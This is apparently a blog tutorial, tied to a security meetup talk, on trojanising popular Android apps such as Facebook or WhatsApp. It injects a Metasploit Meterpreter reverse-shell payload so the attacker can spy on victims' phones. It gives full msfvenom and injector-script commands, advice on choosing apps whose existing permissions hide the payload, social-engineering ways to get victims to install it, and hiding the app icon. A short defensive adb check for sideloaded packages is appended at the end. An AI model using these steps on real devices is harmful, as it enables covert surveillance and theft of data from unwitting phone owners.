How to inject malicious payloads into an Android application

Do you have a smartphone? Do you use apps? Well, you are under attack. This tutorial walks through how easy it is to inject malicious payloads into well-established applications and use them to spy on remote devices. This accompanies the talk I gave at the Colombo Security Meetup.

Disclaimer: This is strictly for educational purposes only. I cannot and will not be responsible for any damage caused using any of these methods.

Skip ahead if you want to get to the tutorial instead of the writeup.

Can mobile phones be hacked?

Mobile phones have many capabilities, including sending SMS, taking calls, taking photos and videos, and recording audio. The device OS usually exposes most of this functionality to applications as an API. The malicious payload uses those APIs and sends the collected details to a remote intruder via a reverse shell. This is similar to writing a custom application to pull these details from the phone; the only difference is that this one is already written, can be reused, and has a reverse shell you can use to connect back at any time.

The technique illustrated here applies only to Android phones. It uses the standard device API methods to access the functionality the phone exposes. It requires the attacker to install a malicious version of an application on the target phone.

Requirements

  • Android phone
  • A machine with a public IP address with Metasploit installed (or run via Docker).

I will be using Metasploit via Docker.

Find a target application

This is the application into which you will inject the malicious payload. You can use any application. A good target is an application like Facebook or Instagram, as the original application already requires permissions such as camera access, so the injected version looks legitimate from the victim's point of view because it does not request any additional permissions. You can download APKs from APKMirror, APKPure.com or any other source. The following steps assume the APK is downloaded and available as original.apk in the current directory.

Generate payload application

The following command mounts the host directory /tmp/test into the container at /tmp/test. msfvenom is then used to generate the Meterpreter payload as an Android application with the given LHOST and LPORT.

docker run \
--rm \
-v /tmp/test:/tmp/test \
-it metasploitframework/metasploit-framework \
./msfvenom \
-p android/meterpreter/reverse_tcp \
LHOST=192.168.8.103 \
LPORT=5555 \
-o /tmp/test/exploited.apk

Replace the IP address and port with those of the machine on which you will run the handler.

This generates a bare application that gives access to all the functionality we need via the reverse shell. Other Android payloads are available as well.

Inject into another application

If you distribute this app as-is, it will almost always be detected and blocked from installing. What you need is another application that users already use, and to inject this payload into it. For example, a widely used application like Facebook or WhatsApp can serve as the container application. On the target phone it provides the full functionality of the container application and, under the hood, also sets up a Meterpreter session.

If you have Metasploit installed on your local machine, you can use msfvenom to do the injection as well.

msfvenom \
-p android/meterpreter/reverse_tcp \
LHOST=192.168.8.103 \
LPORT=5555 \
-o /tmp/test/exploited.apk \
-x /tmp/test/authentic.apk

If you are using Docker, this will fail; use the following method instead.

There are a few steps involved in injecting the script.

1. Download the shell script (wget needs -O, not -o, to write the file itself rather than its log):

wget https://raw.githubusercontent.com/udnisap/apkinjector/master/apkinjector -O /tmp/test/apkinjector

2. Run a container with Java

# Docker with openjdk
docker run \
-v /tmp/test:/tmp/test \
--rm \
-it openjdk bash

3. Inject the payload into the target application using the script downloaded in step 1

cd /tmp/test
chmod +x ./apkinjector
./apkinjector ./exploited.apk ./authentic.apk

4. The script may prompt you a few times; afterwards your injected_authentic.apk will be available on the host machine at /tmp/test/injected_authentic.apk.

Distribute the malicious application

There are a number of ways to get this app onto the victim's device. If you manage to get hold of the victim's phone, you can simply install it. A typical social engineering pattern is to claim to provide additional functionality or an unlocked feature that is not available in the normal app store version of the original application. Since some applications are not available in some regions, that can also be a selling point.

Once the app is installed, the reverse shell lets you hide the application from the main menu, so it is only visible if the user checks the individual installed apps.

Are you a victim?

Well, there is no easy way to verify that all the applications you have are legitimate. But what you can do is simply uninstall all applications and reinstall them from the app store. If you have adb installed
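As an added example that is not part of the original post, the following shell check works from the output of "adb shell pm list packages -i -3" (third-party packages with the installer that put them there) and flags anything not installed by the Play Store package com.android.vending, since a repackaged APK delivered outside the store shows up as sideloaded. The adb and pm commands are real; the sample output is constructed so the check runs offline.

```shell
# Added example (not from the original post): flag sideloaded third-party
# packages from the output of `adb shell pm list packages -i -3`.
# The sample output below is constructed so the check runs offline.
SAMPLE_PM_OUTPUT='package:com.facebook.katana  installer=com.android.vending
package:com.whatsapp  installer=com.android.vending
package:com.example.unlocked  installer=null
package:com.example.modded  installer=com.google.android.packageinstaller'

# Print "package (installer)" for every package whose installer is not the
# Play Store. installer=null means pm has no record of who installed it, and
# the manual package installer means a sideloaded APK; both deserve a look.
flag_sideloaded() {
    printf '%s\n' "$1" | awk '
        /^package:/ {
            sub(/\r$/, "")                 # adb shell output may be CRLF
            pkg = $1; sub(/^package:/, "", pkg)
            split($2, kv, "=")             # kv[2] is the installer package
            if (kv[2] != "com.android.vending") print pkg " (" kv[2] ")"
        }'
}

# Number of flagged packages, handy for scripting an alert (0 when clean).
count_sideloaded() {
    flag_sideloaded "$1" | grep -c '' || true
}

# Live use: flag_sideloaded "$(adb shell pm list packages -i -3)"
flag_sideloaded "$SAMPLE_PM_OUTPUT"
```

A flagged package is not proof of compromise (enterprise MDM and OEM stores also sideload), but each one should be checked against the publisher's signing certificate or simply reinstalled from the store as the text above suggests.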